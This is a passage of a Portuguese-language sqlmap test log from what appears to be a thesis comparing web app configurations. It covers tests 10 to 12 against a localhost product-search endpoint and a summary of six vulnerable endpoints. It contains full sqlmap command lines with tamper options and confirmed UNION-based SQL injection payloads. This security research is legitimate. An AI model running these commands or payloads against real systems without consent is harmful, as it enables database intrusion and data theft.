  --- Fim da saída ---

--------------------------------------------------------------------------------
[10/12] Testando: produtos_busca_nome
  Método:    GET
  Path:      /produtos/busca/
  Descrição: Buscar produtos por nome
  Params:    nome=teste
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/produtos/busca/?nome=teste"

  [!!!] VULNERABILIDADE ENCONTRADA em produtos_busca_nome
        -> Parâmetro vulnerável detectado
        -> SQL Injection confirmada
        -> DBMS identificado

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[,]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . ["]     | .'| . |
  |___|_  [)]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:24:49 /2026-05-31/
  
  [22:24:49] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output' as the output directory
  [22:24:49] [INFO] loading tamper module 'space2comment'
  [22:24:49] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:24:49] [INFO] flushing session file
  [22:24:49] [INFO] testing connection to the target URL
  [22:24:49] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:24:49] [INFO] testing if the target URL content is stable
  [22:24:49] [INFO] target URL content is stable
  [22:24:49] [INFO] testing if GET parameter 'nome' is dynamic
  [22:24:49] [WARNING] GET parameter 'nome' does not appear to be dynamic
  [22:24:49] [WARNING] heuristic (basic) test shows that GET parameter 'nome' might not be injectable
  [22:24:49] [INFO] testing for SQL injection on GET parameter 'nome'
  [22:24:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [22:24:49] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
  [22:24:49] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  [22:24:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  [22:24:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
  [22:24:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  [22:24:49] [INFO] testing 'Generic inline queries'
  [22:24:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
  [22:24:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
  [22:24:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
  [22:24:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
  [22:24:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  [22:24:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
  [22:24:50] [INFO] testing 'Oracle AND time-based blind'
  it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
  [22:24:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  [22:24:50] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  [22:24:50] [INFO] target URL appears to have 5 columns in query
  [22:24:50] [WARNING] applying generic concatenation (CONCAT)
  [22:24:50] [WARNING] reflective value(s) found and filtering out
  [22:24:50] [INFO] GET parameter 'nome' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
  [22:24:50] [INFO] checking if the injection point on GET parameter 'nome' is a false positive
  GET parameter 'nome' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
  ---
  Parameter: nome (GET)
      Type: UNION query
      Title: Generic UNION query (NULL) - 5 columns
      Payload: nome=teste' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(CONCAT('qqkzq','rUVZkSRSxzFyKcfGizcxzrWhCdQBYZrlWAAIrISo'),'qvppq')-- rfUg
  ---
  [22:24:50] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
  [22:24:50] [INFO] testing MySQL
  [22:24:50] [WARNING] the back-end DBMS is not MySQL
  [22:24:50] [INFO] testing Oracle
  [22:24:50] [WARNING] the back-end DBMS is not Oracle
  [22:24:50] [INFO] testing PostgreSQL
  [22:24:50] [WARNING] the back-end DBMS is not PostgreSQL
  [22:24:50] [INFO] testing Microsoft SQL Server
  [22:24:50] [WARNING] the back-end DBMS is not Microsoft SQL Server
  [22:24:50] [INFO] testing SQLite
  [22:24:50] [INFO] confirming SQLite
  [22:24:50] [INFO] actively fingerprinting SQLite
  [22:24:50] [INFO] the back-end DBMS is SQLite
  back-end DBMS: SQLite
  [22:24:50] [WARNING] HTTP error codes detected during run:
  500 (Internal Server Error) - 43 times
  [22:24:50] [INFO] fetched data logged to text files under 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output\localhost'
  
  [*] ending @ 22:24:50 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[11/12] Testando: produtos_busca_categoria
  Método:    GET
  Path:      /produtos/busca/
  Descrição: Buscar produtos por categoria
  Params:    categoria=teste
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/produtos/busca/?categoria=teste"

  [!!!] VULNERABILIDADE ENCONTRADA em produtos_busca_categoria
        -> Parâmetro vulnerável detectado
        -> SQL Injection confirmada
        -> DBMS identificado

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___["]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . ["]     | .'| . |
  |___|_  ["]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:24:50 /2026-05-31/
  
  [22:24:50] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output' as the output directory
  [22:24:50] [INFO] loading tamper module 'space2comment'
  [22:24:50] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0 Unique/97.7.7239.70' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:24:51] [INFO] flushing session file
  [22:24:51] [INFO] testing connection to the target URL
  [22:24:51] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:24:51] [INFO] testing if the target URL content is stable
  [22:24:51] [INFO] target URL content is stable
  [22:24:51] [INFO] testing if GET parameter 'categoria' is dynamic
  [22:24:51] [WARNING] GET parameter 'categoria' does not appear to be dynamic
  [22:24:51] [WARNING] heuristic (basic) test shows that GET parameter 'categoria' might not be injectable
  [22:24:51] [INFO] testing for SQL injection on GET parameter 'categoria'
  [22:24:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [22:24:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
  [22:24:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  [22:24:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  [22:24:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
  [22:24:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  [22:24:51] [INFO] testing 'Generic inline queries'
  [22:24:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
  [22:24:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
  [22:24:51] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
  [22:24:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
  [22:24:51] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  [22:24:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
  [22:24:51] [INFO] testing 'Oracle AND time-based blind'
  it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
  [22:24:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  [22:24:51] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  [22:24:52] [INFO] target URL appears to have 5 columns in query
  [22:24:52] [WARNING] applying generic concatenation (CONCAT)
  [22:24:52] [WARNING] reflective value(s) found and filtering out
  [22:24:52] [INFO] GET parameter 'categoria' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
  [22:24:52] [INFO] checking if the injection point on GET parameter 'categoria' is a false positive
  GET parameter 'categoria' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
  ---
  Parameter: categoria (GET)
      Type: UNION query
      Title: Generic UNION query (NULL) - 5 columns
      Payload: categoria=teste' UNION ALL SELECT NULL,CONCAT(CONCAT('qkpvq','OpoSBRlTPsMMrHuCnYuTfogCXAEsIBNQMzJyGUnE'),'qpjvq'),NULL,NULL,NULL-- yDCI
  ---
  [22:24:52] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
  [22:24:52] [INFO] testing MySQL
  [22:24:52] [WARNING] the back-end DBMS is not MySQL
  [22:24:52] [INFO] testing Oracle
  [22:24:52] [WARNING] the back-end DBMS is not Oracle
  [22:24:52] [INFO] testing PostgreSQL
  [22:24:52] [WARNING] the back-end DBMS is not PostgreSQL
  [22:24:52] [INFO] testing Microsoft SQL Server
  [22:24:52] [WARNING] the back-end DBMS is not Microsoft SQL Server
  [22:24:52] [INFO] testing SQLite
  [22:24:52] [INFO] confirming SQLite
  [22:24:52] [INFO] actively fingerprinting SQLite
  [22:24:52] [INFO] the back-end DBMS is SQLite
  back-end DBMS: SQLite
  [22:24:52] [WARNING] HTTP error codes detected during run:
  500 (Internal Server Error) - 43 times
  [22:24:52] [INFO] fetched data logged to text files under 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output\localhost'
  
  [*] ending @ 22:24:52 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[12/12] Testando: produtos_busca_nome_categoria
  Método:    GET
  Path:      /produtos/busca/
  Descrição: Buscar produtos por nome e categoria
  Params:    nome=teste&categoria=eletronicos
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/produtos/busca/?nome=teste&categoria=eletronicos"

  [!!!] VULNERABILIDADE ENCONTRADA em produtos_busca_nome_categoria
        -> Parâmetro vulnerável detectado
        -> SQL Injection confirmada
        -> DBMS identificado

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[)]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . ["]     | .'| . |
  |___|_  [.]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:24:52 /2026-05-31/
  
  [22:24:52] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output' as the output directory
  [22:24:52] [INFO] loading tamper module 'space2comment'
  [22:24:52] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 OpenWave/96.4.8983.84' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:24:53] [INFO] flushing session file
  [22:24:53] [INFO] testing connection to the target URL
  [22:24:53] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:24:53] [INFO] testing if the target URL content is stable
  [22:24:53] [INFO] target URL content is stable
  [22:24:53] [INFO] testing if GET parameter 'nome' is dynamic
  [22:24:53] [WARNING] GET parameter 'nome' does not appear to be dynamic
  [22:24:53] [WARNING] heuristic (basic) test shows that GET parameter 'nome' might not be injectable
  [22:24:53] [INFO] testing for SQL injection on GET parameter 'nome'
  [22:24:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [22:24:53] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
  [22:24:53] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  [22:24:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  [22:24:53] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
  [22:24:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  [22:24:53] [INFO] testing 'Generic inline queries'
  [22:24:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
  [22:24:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
  [22:24:53] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
  [22:24:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
  [22:24:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  [22:24:53] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
  [22:24:53] [INFO] testing 'Oracle AND time-based blind'
  it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
  [22:24:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  [22:24:53] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  [22:24:53] [INFO] target URL appears to have 5 columns in query
  [22:24:53] [WARNING] applying generic concatenation (CONCAT)
  [22:24:53] [WARNING] reflective value(s) found and filtering out
  [22:24:53] [INFO] GET parameter 'nome' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
  [22:24:53] [INFO] checking if the injection point on GET parameter 'nome' is a false positive
  GET parameter 'nome' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
  ---
  Parameter: nome (GET)
      Type: UNION query
      Title: Generic UNION query (NULL) - 5 columns
      Payload: nome=teste' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qvxvq','VQmYlTBzFcSpwecBoBTkOBLxACnyzRGJwiXWdJYh'),'qjxjq'),NULL,NULL-- nqsQ&categoria=eletronicos
  ---
  [22:24:53] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
  [22:24:53] [INFO] testing MySQL
  [22:24:53] [WARNING] the back-end DBMS is not MySQL
  [22:24:53] [INFO] testing Oracle
  [22:24:53] [WARNING] the back-end DBMS is not Oracle
  [22:24:53] [INFO] testing PostgreSQL
  [22:24:54] [WARNING] the back-end DBMS is not PostgreSQL
  [22:24:54] [INFO] testing Microsoft SQL Server
  [22:24:54] [WARNING] the back-end DBMS is not Microsoft SQL Server
  [22:24:54] [INFO] testing SQLite
  [22:24:54] [INFO] confirming SQLite
  [22:24:54] [INFO] actively fingerprinting SQLite
  [22:24:54] [INFO] the back-end DBMS is SQLite
  back-end DBMS: SQLite
  [22:24:54] [WARNING] HTTP error codes detected during run:
  500 (Internal Server Error) - 43 times
  [22:24:54] [INFO] fetched data logged to text files under 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output\localhost'
  
  [*] ending @ 22:24:54 /2026-05-31/
  
  
  
  --- Fim da saída ---


================================================================================
  RESUMO - com_framework_sem_orm_com_sanitizacao
================================================================================
  Configuração:                COM FRAMEWORK | SEM ORM | COM SANITIZACAO
  Total de endpoints testados: 12
  Vulnerabilidades encontradas: 6
  Erros durante execução:       0

  ENDPOINTS VULNERÁVEIS:
    - [GET] /usuarios (usuarios_listar)
      -> SQL Injection confirmada
    - [GET] /usuarios/busca/ (usuarios_busca_nome)
      -> Parâmetro vulnerável detectado
      -> SQL Injection confirmada
      -> DBMS identificado
    - [GET] /produtos (produtos_listar)
      -> SQL Injection confirmada
    - [GET] /produtos/busca/ (produtos_busca_nome)
      -> Parâmetro vulnerável detectado
      -> SQL Injection confirmada
      -> DBMS identificado
    - [GET] /produtos/busca/ (produtos_busca_categoria)
      -> Parâmetro vulnerável detectado
      -> SQL Injection confirmada
      -> DBMS identificado
    - [GET] /produtos/busca/ (produtos_busca_nome_categoria)
      -> Parâmetro vulnerável detectado
      -> SQL Injection confirmada
      -> DBMS identificado

  Log salvo em: C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\resultado_20260531_222436.txt
  Saídas sqlmap em: C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\com_framework_sem_orm_com_sanitizacao\sqlmap_output
================================================================================
